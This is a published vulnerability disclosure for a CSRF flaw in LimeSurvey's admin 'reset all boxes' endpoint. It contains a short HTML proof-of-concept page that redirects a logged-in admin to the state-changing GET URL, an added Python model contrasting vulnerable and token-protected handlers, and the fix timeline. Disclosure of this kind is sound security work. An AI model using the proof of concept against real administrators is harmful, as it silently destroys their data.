CSRF Leading to reset Boxes in limesurvey/limesurvey

Valid

Reported on Apr 19th 2023


Description

Hello everyone,

During my testing on LimeSurvey's admin demo, I found that the Boxes part of the application is vulnerable to CSRF affecting the reset-boxes functionality: if an admin has created some boxes, an attacker could trick the admin into resetting them by following a link to an attacker-controlled page that submits the vulnerable GET request. Here is the vulnerable GET request:

https://demo.limesurvey.org/index.php?r=homepageSettings/resetAllBoxes

Proof of Concept

// csrf.html
<!DOCTYPE html>
<html>
<head>
    <script>
        // On load, send the victim's browser (carrying its LimeSurvey admin session cookie)
        // to the state-changing GET endpoint, which resets all boxes without any CSRF token.
        window.onload = function() {
            window.location = 'https://demo.limesurvey.org/index.php?r=homepageSettings/resetAllBoxes';
        }
    </script>
</head>
<body>
</body>
</html>

Impact

The CSRF could trick the admin into resetting the boxes, meaning all of the boxes they created will be deleted!
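To show why the reported endpoint is forgeable and what the safe shape of such an action looks like, here is an added, framework-free model (not LimeSurvey's code and not its actual fix): a "reset all boxes" handler that accepts any authenticated request, beside one that requires POST plus a per-session CSRF token. The Request class, the handler names and the box list are constructed for the example.

```python
"""Constructed model of the 'reset all boxes' action from the report.

A link or a window.location redirect (as in the PoC) can only produce a GET,
and the browser attaches the admin's session cookie to it, so a GET that
mutates state is reachable from any attacker page. The hardened handler
rejects GET and demands a token the attacker's page cannot read.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str                                # "GET" or "POST"
    session: dict                              # server-side session of the logged-in admin
    form: dict = field(default_factory=dict)   # POST body fields


def issue_csrf_token(session: dict) -> str:
    """Create one random token per session; the server embeds it in its own forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def reset_all_boxes_vulnerable(request: Request, boxes: list) -> str:
    """Reported pattern: any authenticated request, including a cross-site GET, clears the boxes."""
    boxes.clear()
    return "reset"


def reset_all_boxes_hardened(request: Request, boxes: list) -> str:
    """State changes only on POST carrying a token equal to the session's token."""
    if request.method != "POST":
        return "405 method not allowed"        # links and redirects cannot POST
    expected = request.session.get("csrf_token", "")
    supplied = request.form.get("csrf_token", "")
    # Constant-time comparison; an attacker page cannot read the token from the session
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "403 invalid csrf token"
    boxes.clear()
    return "reset"
```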

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
Carsten Schmitz modified the Severity from Medium (6.5) to None (0) 5 months ago
Carsten Schmitz modified the Severity from None (0) to Medium (4.3) 5 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Carsten Schmitz validated this vulnerability 5 months ago
Moad Akhraz has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 6.1.5 with commit bc2bbb 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jun 26th 2023
Carsten Schmitz published this vulnerability 3 months ago